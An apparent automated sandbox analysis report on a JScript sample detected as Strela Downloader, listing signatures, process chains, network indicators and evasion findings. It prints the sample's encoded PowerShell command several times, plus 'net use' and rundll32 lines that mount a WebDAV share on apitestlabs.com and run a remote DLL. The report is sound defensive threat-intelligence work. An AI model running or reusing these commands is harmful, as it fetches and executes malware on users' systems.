Windows Analysis Report
1933725401135087429.js

Overview

General Information

Sample name: 1933725401135087429.js
Analysis ID: 1544365
MD5: 3bf62f4dcf2f2b9c41911a580d81759b
SHA1: 24aeadf59eb8d7c57c3410742bb6c09b0582e9bf
SHA256: c15c58f6227d072a056e2dbcf182b61e8f0fa781eaead5a62d1048eb4fd53151
Infos:

Detection

Strela Downloader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: 1933725401135087429.js Argument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgA'] Go to definition
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\System32\rundll32.exe

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49709
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49709 -> 94.159.113.48:8888
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 94.159.113.48 94.159.113.48
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: apitestlabs.com
Source: net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156391685.0000020DA0B2D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/
Source: net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/%
Source: net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/V7
Source: net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/em
Source: powershell.exe, 00000002.00000002.2158767347.00000246A1F99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2158767347.00000246A1F72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2158767347.00000246A1F33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Strela Downloader
Source: Yara match File source: amsi64_5060.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5060, type: MEMORYSTR

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA== Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B205D 2_2_00007FFD345B205D
Java / VBScript file with very long strings (likely obfuscated code)
Source: 1933725401135087429.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zsr2ev.mv3.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA== Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 1933725401135087429.js Static file information: File size 1254168 > 1048576

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGw", "0", "false")
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B00BD pushad ; iretd 2_2_00007FFD345B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0347 push esi; ret 2_2_00007FFD345B0376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0327 pushad ; ret 2_2_00007FFD345B0346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0108 push ds; ret 2_2_00007FFD345B01B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B018D push ds; ret 2_2_00007FFD345B01B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0A38 push ecx; ret 2_2_00007FFD345B0A46

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1921 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1315 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\net.exe TID: 1612 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
